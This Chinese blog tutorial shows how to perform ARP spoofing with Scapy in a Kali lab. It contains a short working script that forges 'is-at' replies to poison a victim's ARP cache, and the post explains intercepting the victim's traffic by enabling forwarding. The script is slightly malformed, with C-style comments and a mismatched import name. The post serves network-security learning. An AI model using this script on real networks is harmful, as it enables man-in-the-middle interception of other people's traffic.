Scapy_库_ARP_Spoofing

最新推荐文章于 2024-11-11 23:26:58 发布
最新推荐文章于 2024-11-11 23:26:58 发布
阅读量463 收藏
点赞数
分类专栏: Python Scanner 文章标签: Scapt库 ARP Spoofing
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37170123/article/details/81623868
版权
本文不深入探讨ARP_Spoofing的原理,而是直接展示如何利用Scapy库来实施ARP_Spoofing。通过构造"is-at"类型的ARP数据包,攻击者可以欺骗网络中设备的ARP缓存,将特定IP的MAC地址指向攻击者的设备。一旦欺骗成功,攻击者可以开启数据包转发,使得网络流量经过攻击者设备,从而实现流量嗅探。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ARP_Spoofing

  • 原理在此就不做阐述了,直接抓包上代码
    这里写图片描述

在前面的ARP_Scanner中其实有一个op字段,这字段的作用是这是ARP包的类型。”who-has”是一个广播类型的包,用于请求目标主机的MAC地址,而现在我们要用到的类型是”is-at”,用于回复“who-has”

####构造数据包:is-at

 from scapy.all import (
    Ether, 
    ARP,
    Sendp      //发包函数,只管发包
)

  eth = Ether()        //构造以太包头
  arp = ARP(  
     op = "is-at",      //设置op字段为”is-at”
     hwsrc = "00:0c:29:24:94:d1",    //设置攻击机的MAC地址
     psrc = "192.168.100.1",          //伪造身份IP
     hwdst = "54:89:98:3F:0B:C9",    //靶机的MAC地址
     pdst = "192.168.100.2"         //靶机的源地址
  ) 
 print((eth/arp).show())
 sendp((eth/arp),inter=2,loop=1)
攻击环境

KALI

  • 发起欺骗:
    这里写图片描述
    这里写图片描述

当我们查看ARP的缓存时,发现192.168.100.1的MAC地址和192.168.100.249,这就说明我们欺骗成功,这个时候我们kali上开启数据包转发的功能,那么PC2能正常访问PC1,但是数据流量都可以被kali截获到。

【Python】使用scapy模块编写ARP欺骗脚本
Monsterlz123的博客
07-07 2878
【Python】使用scapy模块编写ARP欺骗脚本 Hello,各位小伙伴们周末好~ 今天复习自己公众号写的文章,小编发现脚本模块现在只挂着两篇文章… 赶紧写起来!!!(公众号逼我学习系列~) 最近决定发奋图强,写多篇python脚本相关的东西 今天我们先来写一个简单的ARP欺骗脚本练练手吧~ 一、scapy工具 我们编写ARP欺骗脚本需要用到scapy模块,利用该模块我们根据自己的需要...
linux Scapy 进行arp数据包详细过程
qq_37719766的博客
03-17 2818
root@hak:~# scapyWARNING: No route found for IPv6destination :: (no default route?)INFO: Can'timport python ecdsa lib. Disabled certificate manipulation toolsWelcome to Scapy (unknown.version)>>...
python 使用scapy进行ARP欺骗
Jeanphorn的专栏
05-14 1万+
1. 说明  ARP欺骗(ARP spoofing),又称ARP病毒(ARP poisoning)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定电脑或所有电脑无法正常连接。最早探讨ARP欺骗的文章是由Yuri Volobue所写的《ARP与ICMP转向游戏》(ARP and ICMP redirection g
ScapyARP询问
weixin_30954265的博客
11-24 206
引言 校园网中,有同学遭受永恒之蓝攻击,但是被杀毒软件查下,并知道了攻击者的ip也是校园网。所以我想看一下,这个ip是PC,还是路由器。 在ip视角,路由器和pc没什么差别。 实现 首先是构造arp报文,进行广播 send.py from scapy.all import * myarp = ARP() myarp.psrc = '172.17.132.176' myarp.pdst = '1...
Scapy__ARP_Scanner
07-27
Scapy(Ether、ARP、srp1模块介绍)、Scanner脚本编写[ARP数据包的构造]
Scapy__STP_Spoofing
qq_37170123的博客
08-14 1060
STP_Spoofing [STP根桥接管] HZVTC网络技术协会 生成树协议会通过BPDU来选举根桥或者非根桥,且当网络收敛完毕后,根桥会一直发送BPDU来位置下游设备之间的关系。其中有几点需要注意: BPDU中包含了优先级、MAC地址等 参数 STP封装的以太包头802.3 在BPDU以太包头中,目的的MAC地址是一个组播地址:01:80:c2:00:00:00 除了以太头和STP头...
SEEDLab网络嗅探与欺骗实验报告:利用Scapy进行Sniffing和Spoofing
"该资源是一份关于网络安全的实验报告,主要关注嗅探(Sniffing)和欺骗(Spoofing)技术,实验中使用了Scapy来编写相关程序。实验涉及网络安全的基础知识,包括Sniffing和Spoofing的原理,Scapy的使用,以及如何...
ScapySniffingAndSpoofing:此存储包含SEED Labs使用Scapy进行嗅探和欺骗的源代码
04-08
ScapySniffingAndSpoofing是一个开源项目,专注于利用Python中的Scapy进行网络嗅探和欺骗操作。Scapy是一个强大的网络数据包构造和分析工具,它允许开发者创建、修改和发送几乎任何类型的网络协议数据包。在这个...
python+scapy实现ARP欺骗
hell_orld的博客
10-24 4787
python+scapy实现ARP欺骗需要下载的ARP欺骗原理源代码:运行结果 需要下载的 可以直接通过pip下载 pip install scapy ARP欺骗原理 设网关的IP为10.10.10.1,MAC为11:22:33:44:55:AA; 攻击主机的IP为10.10.10.3,MAC为11:22:33:44:55:CC; 受害主机的IP为10.10.10.2,MAC为11:22:33:44:55:BB; 1、攻击主机向网关和目标主机发送ARP欺骗报文,告诉目标主机pc2我是网关,但包中的m
ARP协议中的ARP Spoofing攻击原理
ARP协议简介 ## 1.1 ARP协议概述 地址解析协议(Address Resolution Protocol,ARP)是一种用于将IP地址解析为MAC地址的协议。在TCP/IP网络中,当需要将IP地址转换为物理硬件地址(MAC地址)时,就需要使用ARP...
Scapy交互式arp扫描与攻击
qq_37719766的博客
03-17 516
1、局域网Arp扫描:1)  简单实现:(复杂实现定义为方法别人可以自动实现获取自己IP地址所在段或者直接定义循环IP地址)>>>arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))Beginemission:***Finishedto...
scapy实现arp 毒化攻击
ivnetware的博客
04-30 2780
攻击者IP    :192.168.0.112        MAC:00:0c:29:ab:27:ff 被攻击者IP:192.168.0.104        MAC:00:23:14:ad:36:c0 网关IP        :192.168.0.1             MAC:9c:21:6a:4f:cc:38  脚本a.py 欺骗 192.168.0.104主机告诉其网
ARPSpoofingarp欺骗性攻击、arpspoof源码分析
Bonjour~
03-18 1万+
ARPSpoofing 什么是ARP协议 一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网传输的网卡却不能直接识别IP地址,所以用APR解析协议将IP地址解析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,来查询设备的MAC地址。 在局域网的任意一台主机中,都有一个ARP缓存表,里面保存本机已知的此局域网中各主机和路由器的IP地址和MAC地址的对照表关系。ARP缓存表的生命周
ARP:地址解析协议
OSSRS
05-11 6180
以太网内部是用MAC地址传输的,ARP就是IP到MAC的映射。 本机的IP和MAC信息: [winlin@dev6 ~]$ ifconfig eth1      Link encap:Ethernet  HWaddr 08:00:27:55:0F:09  在hosts中添加一个地址记录: vi /etc/hosts 192.168.20.190 winlin002 其中,wi
使用tcpdump观察ARP通信过程和ARP报文详解
热门推荐
Be The Best!
01-14 1万+
tcpdump观察ARP通信过程
使用 Scapy 编写 ARP 欺骗攻击脚本
Flag少侠的博客
03-26 2490
ARP(Address Resolution Protocol)缓存中毒是一种网络攻击,它利用了ARP协议中的漏洞,通过欺骗或篡改网络中的ARP缓存来实施攻击。ARP协议是用于将IP地址映射到物理MAC地址的协议,在IPv4网络中,每台计算机都有一个ARP缓存,用于保存IP地址到MAC地址的映射关系,以便进行网络通信。
ARP欺骗技术:ARP欺骗工具介绍_(11).Arpspoofing的原理与实践
最新发布
chenlz2007的博客
11-11 888
ARP(Address Resolution Protocol)协议是用于将IP地址解析为物理地址(即MAC地址)的通信协议。在局域网中,每台主机都需要通过ARP协议来获取其他主机的MAC地址,以便进行数据包的传输。ARP协议的工作原理非常简单,主要包括以下步骤:ARP请求:当主机A需要发送数据包给主机B时,主机A会首先在自己的ARP缓存中查找主机B的MAC地址。如果找不到,主机A会广播一个ARP请求数据包,询问主机B的MAC地址。这个请求数据包包含主机A的IP地址、MAC地址,以及目标主机B的IP地址。A
neutron flat和vxlan网络访问外网流量走向
weixin_30367543的博客
05-27 255
OpenStack版本:Mitaka 物理节点: Hostname Management IP Tunnel IP Role test-ctrl-01 192.168.100.11 192.168.120.11 Controller Node、Network Node test-cmpt-01 192.168.100.21 192.168.120...
ARP病毒攻击技术分析与防御(补充知识)
kv_faq的专栏
08-31 1087
ARP病毒攻击技术分析与防御--  ARP病毒攻击技术分析与防御一、ARP Spoofing攻击原理分析在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞或者实现“man in the middle” 进行ARP重定向和嗅探攻击。用伪造源MA
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值